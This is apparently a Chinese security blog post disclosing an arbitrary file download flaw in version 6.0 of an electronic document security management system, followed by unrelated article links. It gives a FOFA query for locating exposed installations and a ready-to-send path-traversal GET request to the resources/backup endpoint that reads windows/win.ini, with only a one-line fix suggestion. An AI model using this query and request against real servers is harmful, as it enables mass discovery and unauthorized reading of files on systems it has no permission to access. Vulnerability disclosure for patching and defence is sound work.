电子文档安全管理系统V6.0接口backup存在任意文件下载漏洞

免责声明:本号提供的网络安全信息仅供参考,不构成专业建议。作者不对任何由于使用本文信息而导致的直接或间接损害承担责任。如涉及侵权,请及时与我联系,我将尽快处理并删除相关内容。

漏洞描述

电子文档安全管理系统 V6.0 resources/backup存在任意文件下载漏洞,攻击者可通过该漏洞获取服务器所有文件信息。

搜索语法

FOFA:body="docsafe/docsafe.nocache.js"

漏洞再现

GET /resources/backup//..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5cwindows/win.ini HTTP/1.1

Host:

Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7

Accept-Encoding: gzip, deflate, br, zstd

Accept-Language: zh-CN,zh;q=0.9

Connection: keep-alive

修复建议

禁用特殊字符,限制文件读取路径。关注厂商官网信息,及时更新版本

相关推荐
不简说25 分钟前
JS 代码技巧 vol.1 — 10 个让代码少写 30% 的小套路
前端·javascript·面试
@@@@@@@@5428 分钟前
JavaScript 的缺点与 TypeScript 的弥补
开发语言·javascript·typescript
Hilaku29 分钟前
为什么业务型前端容易遭遇中年危机?
前端·javascript·程序员
tachibana230 分钟前
hot100 课程表(207)
java·数据结构·算法·leetcode
神仙别闹31 分钟前
编写基于C++ Huffman 算法的无损压缩程序和解压程序
java·c++·算法
এ慕ོ冬℘゜38 分钟前
深度解析 JavaScript:赋予 Web 灵魂的“全栈语言”
开发语言·前端·javascript
iCOD3R40 分钟前
Skill - 3秒生成精美GitHub主页
前端·程序员·ai编程
爱勇宝1 小时前
《道德经》第5章:生产环境不相信眼泪
前端·后端·架构
IT乐手1 小时前
Android 写本地日志工具类
android·java
掘金者阿豪1 小时前
LEFT JOIN 凭空消失的背后,是优化器偷偷帮你做了决定
前端·后端